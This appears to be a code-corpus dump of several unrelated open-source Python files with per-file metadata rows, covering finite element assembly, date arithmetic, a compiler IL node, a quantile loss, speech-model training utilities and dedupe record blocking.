loader.add_value('quest', quest)
quest_detail = response.xpath('//div[@class="cuestion-contenido"]/text()').extract_first().strip()
loader.add_value('quest_detail', quest_detail)
answer_raw = response.xpath('//div[@class="cuestion-contenido"][2]').extract_first()
loader.add_value('answer', html2text.html2text(answer_raw))
author = response.xpath('//h4[2]/text()').extract_first().strip()
if author:
loader.add_value('author', author)
loader.add_value('url', response.url)
return loader.load_item()
| 49.258427 | 106 | 0.624088 | 526 | 4,384 | 5.01711 | 0.195817 | 0.054566 | 0.074271 | 0.06366 | 0.454718 | 0.303524 | 0.216749 | 0.203486 | 0.133384 | 0.133384 | 0 | 0.008095 | 0.210995 | 4,384 | 88 | 107 | 49.818182 | 0.754553 | 0.020073 | 0 | 0.150685 | 0 | 0 | 0.20014 | 0.11957 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054795 | false | 0 | 0.054795 | 0 | 0.191781 | 0.123288 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2e204a847aae355756265cbadb65a2b2d664e9b | 7,410 | py | Python | simfempy/fems/fem.py | beckerrh/simfempy | 10bf30f330d921bffaa8572bbd73286da5971905 | [
"MIT"
] | null | null | null | simfempy/fems/fem.py | beckerrh/simfempy | 10bf30f330d921bffaa8572bbd73286da5971905 | [
"MIT"
] | null | null | null | simfempy/fems/fem.py | beckerrh/simfempy | 10bf30f330d921bffaa8572bbd73286da5971905 | [
"MIT"
] | 1 | 2021-06-09T15:49:51.000Z | 2021-06-09T15:49:51.000Z | # -*- coding: utf-8 -*-
"""
Created on Sun Dec 4 18:14:29 2016
@author: becker
"""
import numpy as np
import numpy.linalg as linalg
from simfempy import fems
from simfempy.meshes.simplexmesh import SimplexMesh
import scipy.sparse as sparse
#=================================================================#
class Fem(object):
def __repr__(self):
repr = f"{self.__class__.__name__}"
return repr
def __init__(self, **kwargs):
mesh = kwargs.get('mesh', None)
if mesh is not None: self.setMesh(mesh)
def setMesh(self, mesh, innersides=False):
self.mesh = mesh
self.nloc = self.nlocal()
if innersides: self.mesh.constructInnerFaces()
def computeStencilCell(self, dofspercell):
self.cols = np.tile(dofspercell, self.nloc).ravel()
self.rows = np.repeat(dofspercell, self.nloc).ravel()
#Alternative
# self.rows = dofspercell.repeat(self.nloc).reshape(self.mesh.ncells, self.nloc, self.nloc)
# self.cols = self.rows.swapaxes(1, 2)
# self.cols = self.cols.reshape(-1)
# self.rows = self.rows.reshape(-1)
# def computeStencilInnerSidesCell(self, dofspercell):
# nloc, faces, cellsOfFaces = self.nloc, self.mesh.faces, self.mesh.cellsOfFaces
# # print(f"{faces=}")
# # print(f"{cellsOfFaces=}")
# innerfaces = cellsOfFaces[:,1]>=0
# cellsOfInteriorFaces= cellsOfFaces[innerfaces]
# self.cellsOfInteriorFaces = cellsOfInteriorFaces
# self.innerfaces = innerfaces
# return
# # print(f"{innerfaces=}")
# print(f"{cellsOfInteriorFaces=}")
# raise NotImplementedError(f"no")
# ncells, nloc = dofspercell.shape[0], dofspercell.shape[1]
# print(f"{ncells=} {nloc=}")
# print(f"{dofspercell[cellsOfInteriorFaces,:].shape=}")
# rows = dofspercell[cellsOfInteriorFaces,:].repeat(nloc)
# cols = np.tile(dofspercell[cellsOfInteriorFaces,:],nloc)
# print(f"{rows=}")
# print(f"{cols=}")
def interpolateCell(self, f):
if isinstance(f, dict):
b = np.zeros(self.mesh.ncells)
for label, fct in f.items():
if fct is None: continue
cells = self.mesh.cellsoflabel[label]
xc, yc, zc = self.mesh.pointsc[cells].T
b[cells] = fct(xc, yc, zc)
return b
else:
xc, yc, zc = self.mesh.pointsc.T
return f(xc, yc, zc)
def computeMatrixDiffusion(self, coeff):
ndofs = self.nunknowns()
# matxx = np.einsum('nk,nl->nkl', self.cellgrads[:, :, 0], self.cellgrads[:, :, 0])
# matyy = np.einsum('nk,nl->nkl', self.cellgrads[:, :, 1], self.cellgrads[:, :, 1])
# matzz = np.einsum('nk,nl->nkl', self.cellgrads[:, :, 2], self.cellgrads[:, :, 2])
# mat = ( (matxx+matyy+matzz).T*self.mesh.dV*coeff).T.ravel()
cellgrads = self.cellgrads[:,:,:self.mesh.dimension]
mat = np.einsum('n,nil,njl->nij', self.mesh.dV*coeff, cellgrads, cellgrads).ravel()
return sparse.coo_matrix((mat, (self.rows, self.cols)), shape=(ndofs, ndofs)).tocsr()
def computeFormDiffusion(self, du, u, coeff):
doc = self.dofspercell()
cellgrads = self.cellgrads[:,:,:self.mesh.dimension]
r = np.einsum('n,nil,njl,nj->ni', self.mesh.dV*coeff, cellgrads, cellgrads, u[doc])
np.add.at(du, doc, r)
def computeMatrixLps(self, betart, **kwargs):
param = kwargs.pop('lpsparam', 0.1)
dimension, dV, ndofs = self.mesh.dimension, self.mesh.dV, self.nunknowns()
nloc, dofspercell = self.nlocal(), self.dofspercell()
ci = self.mesh.cellsOfInteriorFaces
ci0, ci1 = ci[:,0], ci[:,1]
normalsS = self.mesh.normals[self.mesh.innerfaces]
dS = linalg.norm(normalsS, axis=1)
scale = 0.5*(dV[ci0]+ dV[ci1])
betan = np.absolute(betart[self.mesh.innerfaces])
# betan = 0.5*(np.linalg.norm(betaC[ci0],axis=1)+ np.linalg.norm(betaC[ci1],axis=1))
scale *= param*dS*betan
cg0 = self.cellgrads[ci0, :, :]
cg1 = self.cellgrads[ci1, :, :]
mat00 = np.einsum('nki,nli,n->nkl', cg0, cg0, scale)
mat01 = np.einsum('nki,nli,n->nkl', cg0, cg1, -scale)
mat10 = np.einsum('nki,nli,n->nkl', cg1, cg0, -scale)
mat11 = np.einsum('nki,nli,n->nkl', cg1, cg1, scale)
rows0 = dofspercell[ci0,:].repeat(nloc)
cols0 = np.tile(dofspercell[ci0,:],nloc).reshape(-1)
rows1 = dofspercell[ci1,:].repeat(nloc)
cols1 = np.tile(dofspercell[ci1,:],nloc).reshape(-1)
A00 = sparse.coo_matrix((mat00.reshape(-1), (rows0, cols0)), shape=(ndofs, ndofs))
A01 = sparse.coo_matrix((mat01.reshape(-1), (rows0, cols1)), shape=(ndofs, ndofs))
A10 = sparse.coo_matrix((mat10.reshape(-1), (rows1, cols0)), shape=(ndofs, ndofs))
A11 = sparse.coo_matrix((mat11.reshape(-1), (rows1, cols1)), shape=(ndofs, ndofs))
return A00+A01+A10+A11
def computeFormLps(self, du, u, betart, **kwargs):
param = kwargs.pop('lpsparam', 0.1)
dimension, dV, ndofs = self.mesh.dimension, self.mesh.dV, self.nunknowns()
nloc, dofspercell = self.nlocal(), self.dofspercell()
ci = self.mesh.cellsOfInteriorFaces
ci0, ci1 = ci[:,0], ci[:,1]
normalsS = self.mesh.normals[self.mesh.innerfaces]
dS = linalg.norm(normalsS, axis=1)
scale = 0.5*(dV[ci0]+ dV[ci1])
betan = np.absolute(betart[self.mesh.innerfaces])
scale *= param*dS*betan
cg0 = self.cellgrads[ci0, :, :]
cg1 = self.cellgrads[ci1, :, :]
r = np.einsum('nki,nli,n,nl->nk', cg0, cg0, scale, u[dofspercell[ci0,:]]-u[dofspercell[ci1,:]])
np.add.at(du, dofspercell[ci0,:], r)
# mat01 = np.einsum('nki,nli,n,nl->nk', cg0, cg1, -scale, u[dofspercell[ci1,:]])
# np.add.at(du, dofspercell[ci0,:], mat01)
r = np.einsum('nki,nli,n,nl->nk', cg1, cg0, -scale, u[dofspercell[ci0,:]]-u[dofspercell[ci1,:]])
np.add.at(du, dofspercell[ci1,:], r)
# mat11 = np.einsum('nki,nli,n,nl->nk', cg1, cg1, scale, u[dofspercell[ci1,:]])
# np.add.at(du, dofspercell[ci1,:], mat11)
def computeFormConvection(self, du, u, data, method, **kwargs):
if method[:4] == 'supg':
self.computeFormTransportSupg(du, u, data, method)
elif method == 'upwalg':
self.computeFormTransportUpwindAlg(du, u, data)
elif method[:3] == 'upw':
self.computeFormTransportUpwind(du, u, data, method)
elif method == 'lps':
self.computeFormTransportLps(du, u, data, **kwargs)
else:
raise NotImplementedError(f"{method=}")
def computeMatrixConvection(self, data, method, **kwargs):
if method[:4] == 'supg':
return self.computeMatrixTransportSupg(data, method)
elif method == 'upwalg':
return self.computeMatrixTransportUpwindAlg(data)
elif method[:3] == 'upw':
return self.computeMatrixTransportUpwind(data, method)
elif method == 'lps':
return self.computeMatrixTransportLps(data, **kwargs)
else:
raise NotImplementedError(f"{method=}")
# ------------------------------------- #
if __name__ == '__main__':
trimesh = SimplexMesh(geomname="backwardfacingstep", hmean=0.3)
| 46.898734 | 104 | 0.588394 | 888 | 7,410 | 4.877252 | 0.203829 | 0.049873 | 0.020319 | 0.02586 | 0.392057 | 0.363426 | 0.305241 | 0.232279 | 0.211499 | 0.208728 | 0 | 0.027445 | 0.232928 | 7,410 | 157 | 105 | 47.197452 | 0.734518 | 0.244399 | 0 | 0.361111 | 0 | 0 | 0.043063 | 0.004505 | 0 | 0 | 0 | 0 | 0 | 1 | 0.101852 | false | 0 | 0.046296 | 0 | 0.240741 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
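The assembly code above (computeMatrixDiffusion and the LPS blocks) replaces the classic per-cell loop with one np.einsum contraction plus a single scipy COO construction. A minimal standalone sketch of that pattern, with hypothetical toy stand-ins for the mesh quantities:

import numpy as np
from scipy import sparse

ncells, nloc, dim, ndofs = 4, 3, 2, 6               # toy problem sizes
cellgrads = np.random.rand(ncells, nloc, dim)       # per-cell shape-function gradients
dV = np.random.rand(ncells)                         # cell volumes
dofs = np.random.randint(0, ndofs, (ncells, nloc))  # stand-in for dofspercell()

# local blocks: mat[n, i, j] = dV[n] * grad_i . grad_j on cell n
mat = np.einsum('n,nil,njl->nij', dV, cellgrads, cellgrads).ravel()
rows = dofs.repeat(nloc)                            # i-index of every local entry
cols = np.tile(dofs, nloc).reshape(-1)              # j-index of every local entry
# coo_matrix sums duplicate (row, col) pairs, which is exactly FEM assembly
A = sparse.coo_matrix((mat, (rows, cols)), shape=(ndofs, ndofs)).tocsr()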
a2e28eb703a3cba58f973912a71313b82fe8577c | 1,476 | py | Python | time/time/timedelta_test.py | Nobodylesszb/python_module | 37d2cdcf89a3ff02a9e560696a059cec9272bd1f | [
"MIT"
] | null | null | null | time/time/timedelta_test.py | Nobodylesszb/python_module | 37d2cdcf89a3ff02a9e560696a059cec9272bd1f | [
"MIT"
] | null | null | null | time/time/timedelta_test.py | Nobodylesszb/python_module | 37d2cdcf89a3ff02a9e560696a059cec9272bd1f | [
"MIT"
] | null | null | null | # Get the first and last day of the previous month
import datetime
import time
# today = datetime.date.today()
# print(today)
# mlast_day = datetime.date(today.year, today.month, 1) - datetime.timedelta(1)
# print(mlast_day)
# """
# output:
# 2019-06-11
# 2019-05-31
# """
# mfirst_day = datetime.date(mlast_day.year, mlast_day.month, 1)
# print(mfirst_day) # 2019-05-01
# # Get the time difference
# start_time = datetime.datetime.now()
# time.sleep(5)
# end_time = datetime.datetime.now()
# print(start_time)
# print(end_time)
# """
# output:
# 2019-06-11 13:56:57.681902
# 2019-06-11 13:57:02.682107
# """
# d = (end_time - start_time).seconds
# print(d) # 5
# # Compute the time 8 hours ahead of the current time
# d1 = datetime.datetime.now()
# d2 = d1 + datetime.timedelta(hours = 8)
# print(d2) #2019-06-11 21:58:51.210277
# # Compute the dates of last Monday and last Sunday
# today = datetime.date.today()
# today_weekday = today.isoweekday()
# print(today_weekday)
# last_sunday = today - datetime.timedelta(days=today_weekday)
# last_monday = last_sunday - datetime.timedelta(days=6)
# print(last_sunday)
# print(last_monday)
# """
# output:
# 2
# 2019-06-09
# 2019-06-03
# """
# Compute the last day of the month for a given date and the number of days in that month
def eomonth(date_object):
if date_object.month == 12:
next_month_first_date = datetime.date(date_object.year+1,1,1)
else:
next_month_first_date = datetime.date(date_object.year, date_object.month+1, 1)
return next_month_first_date - datetime.timedelta(1)
date = datetime.date(2017,12,20)
print(eomonth(date)) # 2017-12-31
print(eomonth(date).day) # 31 | 22.363636 | 87 | 0.699187 | 218 | 1,476 | 4.577982 | 0.307339 | 0.084168 | 0.032064 | 0.054108 | 0.114228 | 0.088176 | 0.088176 | 0.088176 | 0.088176 | 0 | 0 | 0.109363 | 0.138889 | 1,476 | 66 | 88 | 22.363636 | 0.675846 | 0.662602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.363636 | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
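A standard-library cross-check for the eomonth() helper above: calendar.monthrange(year, month) returns (weekday of the 1st, number of days in the month), so for Gregorian dates it should agree with the timedelta-based computation.

import calendar
import datetime

d = datetime.date(2017, 12, 20)
n_days = calendar.monthrange(d.year, d.month)[1]
print(datetime.date(d.year, d.month, n_days))  # 2017-12-31
print(n_days)                                  # 31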
a2f22b77e03d93c71a7b79660b3f1b0af9f098da | 337 | py | Python | src/code_generation/nodesIL/allocate_node_il.py | CRafa97/cool-compiler-2020 | e581d7b9e7755a9e241a97fa38b6e62364647574 | [
"MIT"
] | null | null | null | src/code_generation/nodesIL/allocate_node_il.py | CRafa97/cool-compiler-2020 | e581d7b9e7755a9e241a97fa38b6e62364647574 | [
"MIT"
] | null | null | null | src/code_generation/nodesIL/allocate_node_il.py | CRafa97/cool-compiler-2020 | e581d7b9e7755a9e241a97fa38b6e62364647574 | [
"MIT"
] | null | null | null | from .node_il import *
class AllocateNodeIL(InstructionNodeIL):
def __init__(self, itype, name, dest, idx=None):
super().__init__(idx)
self.type = itype
self.name = name
self.dest = dest
self.out = dest
def __str__(self):
return ("{} = ALLOCATE {}".format(self.dest, self.type)) | 25.923077 | 64 | 0.599407 | 40 | 337 | 4.725 | 0.55 | 0.084656 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.27003 | 337 | 13 | 64 | 25.923077 | 0.768293 | 0 | 0 | 0 | 0 | 0 | 0.047337 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0.1 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2f32c7a98c6e8c80dea4da6614a925784f338bf | 782 | py | Python | Quantile Regression/0. pinball loss/pinball_loss.py | qute012/paper-review | 978dbb8891d1837e065493652877a971c448bafe | [
"Unlicense"
] | 2 | 2021-01-08T08:52:04.000Z | 2021-01-18T06:30:19.000Z | Quantile Regression/0. pinball loss/pinball_loss.py | qute012/paper-review | 978dbb8891d1837e065493652877a971c448bafe | [
"Unlicense"
] | null | null | null | Quantile Regression/0. pinball loss/pinball_loss.py | qute012/paper-review | 978dbb8891d1837e065493652877a971c448bafe | [
"Unlicense"
] | null | null | null | import torch
import torch.nn as nn  # imported as nn so the nn.Module base class below resolves
class PinballLoss(nn.Module):
def __init__(self, quantile=0.10, reduction='mean'):
super(PinballLoss, self).__init__()
self.quantile = quantile
assert 0 < self.quantile
assert self.quantile < 1
self.reduction = reduction
def forward(self, output, target):
errors = target - output
if self.reduction=='mean':
return torch.mean(torch.max((self.quantile-1) * errors, self.quantile * errors))
elif self.reduction=='sum':
return torch.sum(torch.max((self.quantile-1) * errors, self.quantile * errors))
from tensorflow.keras.backend import mean, maximum
def quantile_loss(q, y, pred):
err = (y-pred)
return mean(maximum(q*err, (q-1)*err), axis=-1) | 34 | 92 | 0.640665 | 101 | 782 | 4.871287 | 0.366337 | 0.195122 | 0.079268 | 0.081301 | 0.182927 | 0.182927 | 0.182927 | 0.182927 | 0.182927 | 0 | 0 | 0.01495 | 0.230179 | 782 | 23 | 93 | 34 | 0.802326 | 0 | 0 | 0 | 0 | 0 | 0.014049 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.157895 | false | 0 | 0.157895 | 0 | 0.526316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
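A minimal smoke test for the PyTorch class above, on toy tensors. Note the argument order of forward: the prediction comes first, the target second.

import torch

y_pred = torch.tensor([1.5, 1.5, 3.5])
y_true = torch.tensor([1.0, 2.0, 3.0])
loss_fn = PinballLoss(quantile=0.10, reduction='mean')
print(loss_fn(y_pred, y_true))  # tensor(0.3167) for these values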
a2f4b1b59b07121f986ac422d4df6f8a841dec7d | 5,765 | py | Python | kospeech/utils.py | arturs68/KoSpeech | b48ba0b1f963cc378e7dbc3cc90b87d3b3b1d516 | [
"Apache-2.0"
] | null | null | null | kospeech/utils.py | arturs68/KoSpeech | b48ba0b1f963cc378e7dbc3cc90b87d3b3b1d516 | [
"Apache-2.0"
] | null | null | null | kospeech/utils.py | arturs68/KoSpeech | b48ba0b1f963cc378e7dbc3cc90b87d3b3b1d516 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020, Soohwan Kim. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import torch.nn as nn
import logging
import platform
from omegaconf import DictConfig
from kospeech.optim.lr_scheduler.lr_scheduler import LearningRateScheduler
from kospeech.vocabs import Vocabulary
from torch import optim
from kospeech.optim import (
RAdam,
AdamP,
Novograd,
)
from kospeech.criterion import (
LabelSmoothedCrossEntropyLoss,
JointCTCCrossEntropyLoss,
TransducerLoss,
)
from kospeech.optim.lr_scheduler import (
TriStageLRScheduler,
TransformerLRScheduler,
)
logger = logging.getLogger(__name__)
def check_envirionment(use_cuda: bool) -> torch.device:
"""
    Check the execution environment:
    OS, processor, CUDA version, PyTorch version, etc.
"""
cuda = use_cuda and torch.cuda.is_available()
device = torch.device('cuda' if cuda else 'cpu')
logger.info(f"Operating System : {platform.system()} {platform.release()}")
logger.info(f"Processor : {platform.processor()}")
if str(device) == 'cuda':
for idx in range(torch.cuda.device_count()):
logger.info(f"device : {torch.cuda.get_device_name(idx)}")
logger.info(f"CUDA is available : {torch.cuda.is_available()}")
logger.info(f"CUDA version : {torch.version.cuda}")
logger.info(f"PyTorch version : {torch.__version__}")
else:
logger.info(f"CUDA is available : {torch.cuda.is_available()}")
logger.info(f"PyTorch version : {torch.__version__}")
return device
def get_optimizer(model: nn.Module, config: DictConfig):
supported_optimizer = {
'adam': optim.Adam,
'radam': RAdam,
'adamp': AdamP,
'adadelta': optim.Adadelta,
'adagrad': optim.Adagrad,
'novograd': Novograd,
}
assert config.train.optimizer.lower() in supported_optimizer.keys(), \
f"Unsupported Optimizer: {config.train.optimizer}\n" \
f"Supported Optimizer: {supported_optimizer.keys()}"
if config.model.architecture == 'conformer':
return optim.Adam(
model.parameters(),
betas=config.train.optimizer_betas,
eps=config.train.optimizer_eps,
weight_decay=config.train.weight_decay,
)
return supported_optimizer[config.train.optimizer](
model.module.parameters(),
lr=config.train.init_lr,
weight_decay=config.train.weight_decay,
)
def get_criterion(config: DictConfig, vocab: Vocabulary) -> nn.Module:
if config.model.architecture in ('deepspeech2', 'jasper'):
criterion = nn.CTCLoss(blank=vocab.blank_id, reduction=config.train.reduction, zero_infinity=True)
elif config.model.architecture in ('las', 'transformer') and config.model.joint_ctc_attention:
criterion = JointCTCCrossEntropyLoss(
num_classes=len(vocab),
ignore_index=vocab.pad_id,
reduction=config.train.reduction,
ctc_weight=config.model.ctc_weight,
cross_entropy_weight=config.model.cross_entropy_weight,
blank_id=vocab.blank_id,
dim=-1,
smoothing=config.train.label_smoothing,
)
elif config.model.architecture == 'conformer':
if config.model.decoder == 'rnnt':
criterion = TransducerLoss(blank_id=vocab.blank_id)
else:
criterion = nn.CTCLoss(blank=0, reduction=config.train.reduction, zero_infinity=True)
elif config.model.architecture == 'rnnt':
criterion = TransducerLoss(blank_id=vocab.blank_id)
elif config.model.architecture == 'transformer' and config.train.label_smoothing <= 0.0:
criterion = nn.CrossEntropyLoss(
ignore_index=vocab.pad_id,
reduction=config.train.reduction,
)
else:
criterion = LabelSmoothedCrossEntropyLoss(
num_classes=len(vocab),
ignore_index=vocab.pad_id,
smoothing=config.train.label_smoothing,
reduction=config.train.reduction,
dim=-1,
)
return criterion
def get_lr_scheduler(config: DictConfig, optimizer, epoch_time_step) -> LearningRateScheduler:
if config.train.lr_scheduler == "tri_stage_lr_scheduler":
lr_scheduler = TriStageLRScheduler(
optimizer=optimizer,
init_lr=config.train.init_lr,
peak_lr=config.train.peak_lr,
final_lr=config.train.final_lr,
init_lr_scale=config.train.init_lr_scale,
final_lr_scale=config.train.final_lr_scale,
warmup_steps=config.train.warmup_steps,
total_steps=int(config.train.num_epochs * epoch_time_step),
)
elif config.train.lr_scheduler == "transformer_lr_scheduler":
lr_scheduler = TransformerLRScheduler(
optimizer=optimizer,
peak_lr=config.train.peak_lr,
final_lr=config.train.final_lr,
final_lr_scale=config.train.final_lr_scale,
warmup_steps=config.train.warmup_steps,
decay_steps=config.train.decay_steps,
)
else:
raise ValueError(f"Unsupported Learning Rate Scheduler: {config.train.lr_scheduler}")
return lr_scheduler
| 36.257862 | 106 | 0.678057 | 672 | 5,765 | 5.650298 | 0.282738 | 0.089808 | 0.023176 | 0.038188 | 0.276797 | 0.228602 | 0.211219 | 0.194627 | 0.170398 | 0.129049 | 0 | 0.003122 | 0.222203 | 5,765 | 158 | 107 | 36.487342 | 0.843666 | 0.114657 | 0 | 0.280992 | 0 | 0 | 0.130521 | 0.04653 | 0 | 0 | 0 | 0 | 0.008264 | 1 | 0.033058 | false | 0 | 0.090909 | 0 | 0.165289 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
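A hypothetical minimal config for the factory functions above. The field names are inferred from the attribute accesses in this file rather than from kospeech documentation, so treat the exact schema as an assumption:

from omegaconf import OmegaConf
import torch.nn as nn

config = OmegaConf.create({
    'model': {'architecture': 'rnnt'},
    'train': {'optimizer': 'adam', 'init_lr': 1e-4, 'weight_decay': 1e-6},
})
# the non-conformer branch reads model.module.parameters(), so the model is
# expected to be wrapped (e.g. in nn.DataParallel)
model = nn.DataParallel(nn.Linear(4, 4))
optimizer = get_optimizer(model, config)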
a2f51a3253d92e78e87c1fc02bc05d0247ae5c21 | 7,056 | py | Python | dedupe/blocking.py | NickCrews/dedupe | 05ed2d81702d0d7557741f6a1e5b0cee13e42729 | [
"MIT"
] | null | null | null | dedupe/blocking.py | NickCrews/dedupe | 05ed2d81702d0d7557741f6a1e5b0cee13e42729 | [
"MIT"
] | null | null | null | dedupe/blocking.py | NickCrews/dedupe | 05ed2d81702d0d7557741f6a1e5b0cee13e42729 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
from collections import defaultdict
import logging
import time
from typing import Generator, Tuple, Iterable, Dict, List, Union
from dedupe._typing import Record, RecordID, Data
import dedupe.predicates
logger = logging.getLogger(__name__)
Docs = Union[Iterable[str], Iterable[Iterable[str]]]
def index_list():
return defaultdict(list)
class Fingerprinter(object):
"""Takes in a record and returns all blocks that record belongs to"""
def __init__(self, predicates: List[dedupe.predicates.Predicate]) -> None:
self.predicates = predicates
self.index_fields: Dict[str, Dict[str, List[dedupe.predicates.IndexPredicate]]]
self.index_fields = defaultdict(index_list)
"""
A dictionary of all the fingerprinter methods that use an
index of data field values. The keys are the field names,
which can be useful to know for indexing the data.
"""
self.index_predicates = []
for full_predicate in predicates:
for predicate in full_predicate:
if hasattr(predicate, "index"):
self.index_fields[predicate.field][predicate.type].append(predicate)
self.index_predicates.append(predicate)
def __call__(
self, records: Iterable[Record], target: bool = False
) -> Generator[Tuple[str, RecordID], None, None]:
"""
Generate the predicates for records. Yields tuples of (predicate,
record_id).
Args:
records: A sequence of tuples of (record_id,
record_dict). Can often be created by
`data_dict.items()`.
target: Indicates whether the data should be treated as
the target data. This effects the behavior of
search predicates. If `target` is set to
`True`, an search predicate will return the
value itself. If `target` is set to `False` the
search predicate will return all possible
values within the specified search distance.
Let's say we have a
`LevenshteinSearchPredicate` with an associated
distance of `1` on a `"name"` field; and we
have a record like `{"name": "thomas"}`. If the
`target` is set to `True` then the predicate
will return `"thomas"`. If `target` is set to
`False`, then the blocker could return
`"thomas"`, `"tomas"`, and `"thoms"`. By using
the `target` argument on one of your datasets,
you will dramatically reduce the total number
of comparisons without a loss of accuracy.
.. code:: python
> data = [(1, {'name' : 'bob'}), (2, {'name' : 'suzanne'})]
> blocked_ids = deduper.fingerprinter(data)
            > print(list(blocked_ids))
[('foo:1', 1), ..., ('bar:1', 100)]
"""
start_time = time.perf_counter()
predicates = [
(":" + str(i), predicate) for i, predicate in enumerate(self.predicates)
]
for i, record in enumerate(records):
record_id, instance = record
for pred_id, predicate in predicates:
block_keys = predicate(instance, target=target)
for block_key in block_keys:
yield block_key + pred_id, record_id
if i and i % 10000 == 0:
logger.info(
"%(iteration)d, %(elapsed)f2 seconds",
{"iteration": i, "elapsed": time.perf_counter() - start_time},
)
def reset_indices(self) -> None:
"""
        Fingerprinter indices can take up a lot of memory. If you are
        done with blocking, this method will reset the indices to free up memory.
        If you need to block again, the data will need to be re-indexed.
"""
for predicate in self.index_predicates:
predicate.reset()
def index(self, docs: Docs, field: str) -> None:
"""
Add docs to the indices used by fingerprinters.
Some fingerprinter methods depend upon having an index of
values that a field may have in the data. This method adds
those values to the index. If you don't have any fingerprinter
methods that use an index, this method will do nothing.
Args:
docs: an iterator of values from your data to index. While
not required, it is recommended that docs be a unique
                set of those values. Indexing can be an expensive
operation.
field: fieldname or key associated with the values you are
indexing
"""
indices = extractIndices(self.index_fields[field])
for doc in docs:
if doc:
for _, index, preprocess in indices:
index.index(preprocess(doc))
for index_type, index, _ in indices:
index.initSearch()
for predicate in self.index_fields[field][index_type]:
logger.debug("Canopy: %s", str(predicate))
predicate.index = index
predicate.bust_cache()
def unindex(self, docs: Docs, field: str) -> None:
"""Remove docs from indices used by fingerprinters
Args:
docs: an iterator of values from your data to remove. While
not required, it is recommended that docs be a unique
                set of those values. Indexing can be an expensive
operation.
field: fieldname or key associated with the values you are
unindexing
"""
indices = extractIndices(self.index_fields[field])
for doc in docs:
if doc:
for _, index, preprocess in indices:
try:
index.unindex(preprocess(doc))
except KeyError:
pass
for index_type, index, _ in indices:
index.initSearch()
for predicate in self.index_fields[field][index_type]:
logger.debug("Canopy: %s", str(predicate))
predicate.index = index
predicate.bust_cache()
def index_all(self, data: Data):
for field in self.index_fields:
unique_fields = {record[field] for record in data.values() if record[field]}
self.index(unique_fields, field)
def extractIndices(index_fields):
indices = []
for index_type, predicates in index_fields.items():
predicate = predicates[0]
index = predicate.index
preprocess = predicate.preprocess
if predicate.index is None:
index = predicate.initIndex()
indices.append((index_type, index, preprocess))
return indices
| 36 | 88 | 0.57483 | 810 | 7,056 | 4.928395 | 0.279012 | 0.027054 | 0.03006 | 0.013026 | 0.267285 | 0.252505 | 0.213427 | 0.213427 | 0.213427 | 0.213427 | 0 | 0.0039 | 0.345947 | 7,056 | 195 | 89 | 36.184615 | 0.861105 | 0.375283 | 0 | 0.240964 | 0 | 0 | 0.020666 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096386 | false | 0.012048 | 0.072289 | 0.012048 | 0.204819 | 0.012048 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
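A toy sketch of the Fingerprinter calling convention. The stand-in below only mimics the interface the class relies on (an iterable "full predicate" with a field attribute whose simple predicates return block keys); it is not one of dedupe's real predicate classes:

class FirstLetterPredicate:
    field = 'name'

    def __iter__(self):  # a "full predicate" yields its simple predicates
        yield self

    def __call__(self, record, target=False):
        return (record['name'][:1],) if record.get('name') else ()

fingerprinter = Fingerprinter([FirstLetterPredicate()])
data = {1: {'name': 'bob'}, 2: {'name': 'suzanne'}}
print(list(fingerprinter(data.items())))  # [('b:0', 1), ('s:0', 2)]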
